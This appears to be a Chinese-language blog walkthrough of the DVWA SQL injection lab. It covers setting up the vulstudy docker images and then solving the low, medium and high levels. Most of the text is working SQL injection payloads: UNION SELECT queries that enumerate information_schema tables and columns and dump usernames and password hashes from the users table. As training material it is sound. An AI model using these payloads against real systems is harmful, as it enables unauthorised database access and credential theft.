vulstudy之DVWAsql注入练习

Vulstudy/DVWA sql注入练习

目录

Vulstudy/DVWA sql注入练习 

一．Vulstudy搭建 

二．Sql注入 

Low级别： 

medium级别 

High级别 

一．Vulstudy搭建

vulstudy vulstudy是专门收集当下流行的漏洞学习平台，并将其制作成docker镜像，方便大家快速搭建环境，节省搭建时间，专注于漏洞学习上。包含以下漏洞平台 下面就来详细介绍下环境搭建过程。

项目地址:

https://github.com/c0ny1/vulstudy.git

本人使用的是ubuntu7.5.0

命令:

git clone https://github.com/c0ny1/vulstudy.git

Cd DVWA

Docker-compose up -d 启动

访问浏览器，搭建成功

二．Sql注入

Low级别

1‘and 1=1

报错

1‘and 1=1#

猜字段

1‘and 1=1 order by 2 #

1‘and 1=1 order by 3 #

报错

可知显示字段只有两位。

联合查询

-1' union select 1,2#

发现注入成功，查询版本。

-1' union select version(),database()#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='users'

获取用户信息

1' union select user,password from users # 

挑一个密码md解密

medium级别

注入点不好判断，直接用burp抓包

id=1 and 1=1

没报错，注入点应为数字注入型

id=1 union select version(),2

后续思路和上一关一样，最后直接查询密码。

id=1 union select user,password from users #

High级别

所谓high级别就是报错只回显 Something went wrong 界面

其实和第一关差不多。

1' union select user,password from users#

至此DVWA sql注入靶场完成。